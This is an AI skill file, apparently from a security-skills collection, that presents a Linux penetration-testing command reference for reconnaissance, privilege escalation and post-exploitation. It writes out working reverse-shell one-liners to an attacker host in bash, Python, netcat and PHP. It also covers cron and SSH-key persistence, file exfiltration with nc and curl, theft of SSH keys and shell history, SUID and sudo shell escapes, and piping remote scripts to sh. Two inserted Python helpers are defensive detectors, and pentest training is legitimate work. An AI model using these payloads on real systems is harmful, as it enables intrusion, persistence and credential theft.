Practical Linux command reference and penetration testing notes for reconnaissance, enumeration, exploitation, and privilege escalation
---
name: linux-pentesting-commands
description: Practical Linux command reference for penetration testing, reconnaissance, exploitation, and privilege escalation
triggers:
- how do I enumerate services on a Linux system
- show me privilege escalation commands for Linux
- what reconnaissance commands should I use for pentesting
- help me with Linux post-exploitation techniques
- show me Linux enumeration commands for pentesting
- what commands do I need for Linux CTF challenges
- guide me through Linux pentesting reconnaissance
- how to find SUID binaries for privilege escalation
---
# Linux Pentesting Commands Skill
> Skill by [ara.so](https://ara.so) — Security Skills collection.
## Overview
**Linux for a Pentester** is a curated collection of practical Linux commands and techniques for penetration testing. This repository organizes commands by penetration testing phases: reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation. It's designed as a quick reference guide for CTF challenges, vulnerability assessments, and security audits.
## Repository Structure
The project is organized into focused modules:
- **00-General-Commands/** - Essential Linux survival commands
- **01-Recon/** - Local and network reconnaissance
- **02-Enumeration/** - Service and user data enumeration
- **03-Exploitation/** - Initial access and shell techniques
- **04-Privilege-Escalation/** - Privilege escalation vectors
- **05-Post-Exploitation/** - Persistence and lateral movement
- **Cheatsheets/** - Quick reference one-liners
## Installation & Setup
```bash
# Clone the repository
git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester
# Navigate to specific modules as needed
cd 01-Recon/
cd 04-Privilege-Escalation/
```
## Key Command Categories
### General System Commands
Essential commands for system navigation and basic reconnaissance:
```bash
# System information
uname -a # Kernel version and system info
cat /etc/os-release # OS distribution details
hostname # System hostname
whoami # Current user
id # User and group IDs
w # Who is logged in
last # Login history
# File system navigation
find / -name flag.txt 2>/dev/null # Find files by name
find / -type f -perm -4000 2>/dev/null # Find SUID binaries
locate "*.conf" # Quick file location (quote the glob so the shell does not expand it first)
which python python3 # Find binary paths
```
### Reconnaissance Phase
Commands for initial system and network discovery:
```bash
# Network reconnaissance
ip a # Network interfaces
ifconfig # Network configuration (legacy)
netstat -tulpn # Active connections and listening ports
ss -tulpn # Socket statistics (modern alternative)
route -n # Routing table
arp -a # ARP cache
# Process enumeration
ps aux # All running processes
ps -ef --forest # Process tree view
top # Real-time process monitor
pstree # Process hierarchy
# Service discovery
systemctl list-units --type=service # SystemD services
service --status-all # SysV services
cat /etc/services # Service port mappings
```
### Enumeration Techniques
Deep-dive commands for service and configuration analysis:
```bash
# User enumeration
cat /etc/passwd # System users
cat /etc/group # User groups
cat /etc/shadow # Password hashes (requires root)
grep -v -E "^#|^$" /etc/passwd # Clean user list
# Configuration files
find /etc -name "*.conf" 2>/dev/null # All config files
cat /etc/ssh/sshd_config # SSH configuration
cat /etc/crontab # Scheduled tasks
ls -la /etc/cron.* # Cron directories
# File capabilities and permissions
getcap -r / 2>/dev/null # Files with capabilities
find / -perm -2 -type f 2>/dev/null # World-writable files
find / -perm -4000 -type f 2>/dev/null # SUID binaries
find / -perm -6000 -type f 2>/dev/null # SUID + SGID binaries
# Environment and history
env # Environment variables
cat ~/.bash_history # Command history
cat ~/.bashrc # Bash configuration
```
### Privilege Escalation Vectors
Commands to identify privilege escalation opportunities:
```bash
# SUID/SGID exploitation
find / -perm -u=s -type f 2>/dev/null # SUID files
find / -perm -g=s -type f 2>/dev/null # SGID files
# Common SUID escalation examples
/usr/bin/find . -exec /bin/sh -p \; -quit # Find SUID abuse
/usr/bin/vim -c ':!/bin/sh' # Vim escape
/usr/bin/nmap --interactive # Nmap older versions
# Sudo enumeration
sudo -l # Sudo permissions
cat /etc/sudoers # Sudoers file (if readable)
# Sudo abuse examples (GTFOBins patterns)
sudo find . -exec /bin/sh \; -quit
sudo vim -c ':!/bin/sh'
sudo awk 'BEGIN {system("/bin/sh")}'
sudo python -c 'import os; os.system("/bin/sh")'
# Kernel exploits
uname -a # Kernel version
cat /proc/version # Detailed version info
searchsploit linux kernel $(uname -r) # Search for exploits
# Cron job abuse
cat /etc/crontab # System cron
ls -la /etc/cron.d # Cron directories
crontab -l # User crontab
pspy64 # Monitor processes (if available)
# Capabilities abuse
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")' # If cap_setuid
```
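The capability and SUID listings from the Enumeration and Privilege Escalation sections above are just as useful for auditing a host as for attacking it. The following is an added defensive helper, not code from the original reference: it parses `getcap -r /` output (both the older `path = caps+ep` and the newer libcap `path caps=ep` layouts), flags capabilities that can escalate, and diffs a current SUID listing against a saved baseline. The `RISKY_CAPS` set and all sample data are constructed assumptions.

```python
"""Added audit helper, not part of the original reference: parse `getcap -r /`
output, flag escalation-capable file capabilities, and report SUID binaries
that are not in a known-good baseline. All sample data is constructed."""
import re

# cap_setuid is the case the reference abuses above; the rest are the other
# file capabilities usually treated as root-equivalent on a binary (assumed set).
RISKY_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override",
              "cap_dac_read_search", "cap_sys_admin", "cap_sys_ptrace",
              "cap_sys_module", "cap_chown", "cap_fowner"}

def parse_getcap(line):
    """Return (path, {capability names}) for one getcap line; {"all"} for a bare =ep."""
    path, caps = line.strip().split(None, 1)
    if caps.startswith("= "):          # older layout: "/usr/bin/ping = cap_net_raw+ep"
        caps = caps[2:]
    if "cap_" not in caps:             # "=ep" with no names grants every capability
        return path, {"all"}
    return path, set(re.findall(r"cap_[a-z_]+", caps))

def flag_risky_caps(getcap_output):
    """Map each binary whose capabilities can escalate to its sorted risky names."""
    findings = {}
    for line in getcap_output.splitlines():
        if not line.strip():
            continue
        path, caps = parse_getcap(line)
        hits = {"all"} if "all" in caps else caps & RISKY_CAPS
        if hits:
            findings[path] = sorted(hits)
    return findings

def new_suid_binaries(current_listing, baseline_listing):
    """Paths in the current `find / -perm -4000 -type f` output missing from the baseline."""
    return sorted(set(current_listing.split()) - set(baseline_listing.split()))

# Constructed sample output; a real run would feed `getcap -r / 2>/dev/null` here.
SAMPLE_GETCAP = """\
/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.8 cap_setuid=ep
/usr/sbin/arping = cap_net_raw+ep
/opt/tool/backup cap_dac_read_search,cap_chown=ep
"""
SUID_BASELINE = "/usr/bin/sudo\n/usr/bin/passwd\n/usr/bin/su\n"
SUID_CURRENT = SUID_BASELINE + "/tmp/.x/bash\n"   # constructed: an unexpected SUID copy

if __name__ == "__main__":
    for path, caps in flag_risky_caps(SAMPLE_GETCAP).items():
        print(f"[!] {path}: {', '.join(caps)}")
    for path in new_suid_binaries(SUID_CURRENT, SUID_BASELINE):
        print(f"[!] SUID binary not in baseline: {path}")
```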
### Exploitation Techniques
Commands for gaining initial access and establishing shells:
```bash
# Reverse shells
bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
nc -e /bin/sh $ATTACKER_IP 4444
php -r '$sock=fsockopen("$ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# Shell stabilization
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# Ctrl+Z to background
stty raw -echo; fg
reset
# File transfers
# On attacker
python3 -m http.server 8000
nc -lvnp 4444 > file
# On target
wget http://$ATTACKER_IP:8000/file
curl http://$ATTACKER_IP:8000/file -o file
nc $ATTACKER_IP 4444 < file
```
### Post-Exploitation Activities
Commands for persistence and lateral movement:
```bash
# Persistence mechanisms
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'" | crontab -
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
echo "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'" >> /etc/crontab
# Credential harvesting
cat /home/*/.bash_history # User command history
cat /home/*/.ssh/id_rsa # Private SSH keys
find / -name "*.bak" 2>/dev/null # Backup files
find / -name "password*" 2>/dev/null # Password files
grep -r "password" /var/www/html 2>/dev/null # Web configs
# Lateral movement
ssh -i id_rsa user@$TARGET_IP # SSH with key
ssh user@$TARGET_IP # SSH with password
su - otheruser # Switch user
```
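The persistence one-liners above leave recognisable traces in `/etc/crontab`, user crontabs and `authorized_keys`. The following is an added detection example, not code from the original reference: it scans cron content for the reverse-shell indicators used in this page and reports SSH keys whose key material is not in an approved set. The indicator patterns, the approved-key set and the sample inputs are constructed assumptions.

```python
"""Added detection example (not from the original reference): scan cron and
authorized_keys text for the persistence patterns above; samples are constructed."""
import re

# Indicators taken from the reverse-shell and cron one-liners in this reference.
REVERSE_SHELL_PATTERNS = [
    re.compile(r"/dev/tcp/"),                     # bash -i >& /dev/tcp/IP/PORT
    re.compile(r"\bnc\b.*\s-e\s"),                # nc -e /bin/sh
    re.compile(r"\b(python|php|perl)\S*\s+-[cr]\s+.*(socket|fsockopen)"),
]
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-", "sk-")

def suspicious_cron_lines(crontab_text):
    """Return (line_number, line) for non-comment cron entries matching an indicator."""
    hits = []
    for number, line in enumerate(crontab_text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if any(p.search(line) for p in REVERSE_SHELL_PATTERNS):
            hits.append((number, line))
    return hits

def parse_authorized_key(line):
    """Return (key_type, key_blob, comment); tolerates a leading options field."""
    fields = line.split()
    if not fields or fields[0].startswith("#"):
        return None
    for i, field in enumerate(fields):
        if field.startswith(KEY_TYPES) and i + 1 < len(fields):
            return field, fields[i + 1], " ".join(fields[i + 2:])
    return None

def unapproved_keys(authorized_keys_text, approved_blobs):
    """Keys in authorized_keys whose key material is not in the approved set."""
    found = []
    for line in authorized_keys_text.splitlines():
        parsed = parse_authorized_key(line)
        if parsed and parsed[1] not in approved_blobs:
            found.append(parsed)
    return found

# Constructed samples: a planted reverse-shell cron entry and an unknown SSH key.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/203.0.113.5/4444 0>&1'
*/5 * * * * www-data /usr/bin/php /var/www/cron.php
"""
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICONSTRUCTEDKEY1 admin@host
command="/bin/true" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABCONSTRUCTEDKEY2 unknown
"""
APPROVED_BLOBS = {"AAAAC3NzaC1lZDI1NTE5AAAAICONSTRUCTEDKEY1"}
```

Run `suspicious_cron_lines(open("/etc/crontab").read())` and `unapproved_keys(...)` against real files in the same way; the approved set should come from your own key inventory.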
## Common Patterns
### Full System Enumeration Script
```bash
#!/bin/bash
echo "[*] System Information"
uname -a
cat /etc/os-release
echo "[*] Current User"
id
sudo -l 2>/dev/null
echo "[*] Network Configuration"
ip a
netstat -tulpn 2>/dev/null || ss -tulpn
echo "[*] SUID Binaries"
find / -perm -4000 -type f 2>/dev/null
echo "[*] Writable Directories"
find / -writable -type d 2>/dev/null | grep -v proc
echo "[*] Cron Jobs"
cat /etc/crontab
ls -la /etc/cron.*
echo "[*] Interesting Files"
find / -name "*.conf" 2>/dev/null | head -20
find / -name "*password*" 2>/dev/null | head -20
```
### Quick Privilege Escalation Check
```bash
# One-liner for quick wins
(sudo -l; find / -perm -4000 2>/dev/null; cat /etc/crontab; getcap -r / 2>/dev/null) | tee priv_check.txt
```
## Troubleshooting
### Command Not Found
```bash
# If a command is missing, try the equivalent shown on each line
ss -tulpn                            # instead of netstat -tulpn
ip a                                 # instead of ifconfig
whereis python3                      # instead of which python3
find / -name "*.conf" 2>/dev/null    # instead of locate "*.conf"
```
### Permission Denied Errors
```bash
# Redirect errors to null
find / -name flag.txt 2>/dev/null
# Or capture both stdout and stderr separately
command > output.txt 2> errors.txt
```
### Shell Not Interactive
```bash
# Upgrade to fully interactive shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
# or
script -qc /bin/bash /dev/null
```
## Integration with Pentesting Tools
This command reference complements tools like:
- **LinPEAS** - Automated privilege escalation scanner
- **LinEnum** - Linux enumeration script
- **pspy** - Process monitoring without root
- **GTFOBins** - Unix binaries exploitation database
```bash
# Running automated tools
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh && bash LinEnum.sh
```
## Best Practices
1. **Always redirect errors** when searching filesystem: `2>/dev/null`
2. **Check sudo permissions first**: `sudo -l` is often overlooked
3. **Enumerate thoroughly** before exploiting - know your target
4. **Document findings** as you go - useful for reports
5. **Use TAB completion** to avoid typos in critical commands
6. **Stabilize shells immediately** after getting initial access
## Resources
- GTFOBins: https://gtfobins.github.io/
- HackTricks: https://book.hacktricks.xyz/
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings
---
**Note**: These commands are for authorized penetration testing and educational purposes only. Always obtain proper authorization before testing any system.
Creator's repository · aradotso/security-skills